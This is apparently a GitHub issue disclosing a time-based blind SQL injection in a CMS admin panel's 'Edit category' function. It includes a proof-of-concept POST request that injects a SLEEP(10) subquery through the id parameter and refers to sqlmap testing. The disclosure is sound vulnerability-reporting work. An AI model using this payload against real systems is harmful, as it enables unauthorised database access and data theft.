Skip to content

There is SQL blind injection at "Edit category"(Column administrator authority) #8

Open
@UUFR

Description

Log in to the background as the default account admin.
1
We click in order and grab packets:
2
3
4
There is a time-based blind SQL injection vulnerability in the location of id.
5
6
POC:
http://192.168.102.129:82/admin/admin.php
post:name=test&nickname=test&fid=&cattpl=&listtpl=&distpl=&intro=test&orders=0&status=1&action=category&id=3) AND (SELECT 8663 FROM (SELECT(SLEEP(10)))IUse) AND (6655=6655&ctrl=update&Submit=%E6%8F%90%E4%B

sqlmap:
Save the HTTP request package as a file .
7
Test using the SQLMap tool :
8

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions